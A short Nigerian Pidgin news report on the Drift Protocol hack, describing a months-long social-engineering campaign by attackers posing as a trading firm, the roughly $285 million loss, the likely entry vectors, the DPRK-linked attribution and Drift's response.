Drift Protocol hack: fake quant firm make dem lose $285M

Di Drift Protocol hack happen for six months, as attackers dey pose as one quantitative trading firm instead make dem knack keys one time. From fall 2025, di group dey build trust through face-to-face meetings for different countries and onboarding heavy talks. Dem create one Telegram channel from day one. By December 2025, attackers don onboard one Ecosystem Vault and deposit over $1 million of their own capital. By February 2026, contributors believe say di relationship legit. On April 1, 2026, Drift say attacker access turn into active exploitation. Telegram chats vanish, malicious software comot from affected endpoints, and di incident lead to $285 million wey dem carry go — after Drift don already compromised. Drift list three likely entry vectors: (1) cloned repository for a "vault frontend", (2) persuading person wey contribute make e install TestFlight app wey dem dey market as wallet product, and (3) exploit known VSCode/Cursor vulnerability (Dec 2025–Feb 2026) wey fit silently run arbitrary code when person open files/folders. Attribution connect, with medium-high confidence, to DPRK state-affiliated actors wey dem dey track as UNC4736/AppleJeus/Citrine Sleet, wey link to earlier October 2024 Radiant Capital attack. Mandiant formal attribution and device forensics still dey in progress. Response: Drift freeze remaining protocol functions, remove compromised wallets from multisig, and flag attacker wallets with exchanges/bridge operators. Drift dey urge teams wey fit don target make dem contact SEAL911. For traders, dis Drift Protocol hack dey reinforce smart-contract and "trust-layer" security risk across DeFi vaults and fit put pressure for sentiment around DRIFT short-term.